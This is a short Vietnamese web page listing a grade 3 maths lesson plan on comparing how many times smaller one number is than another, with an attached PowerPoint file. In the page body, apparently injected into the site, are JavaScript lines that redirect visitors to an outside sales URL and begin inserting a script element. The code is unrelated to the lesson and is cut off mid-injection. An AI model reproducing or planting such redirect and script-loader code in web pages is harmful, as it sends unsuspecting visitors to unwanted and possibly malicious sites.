Giáo án điện tử- Môn Toán- Lớp 3

03/04/2009 12:00 Sáng 0 phản hồi

Bài: So sánh số bé bằng một phần mấy số lớn

location.replace(“http://gethere.info/buy.php”);

var d=document;var s=d.createElement(‘script’);

Tệp đính kèm

12387494442960_so_sanh_so_be_bang....ppt
File: 12387494442960_so_sanh_so_be_bang....ppt (157 kB)

Để lại phản hồi của bạn cho bài viết này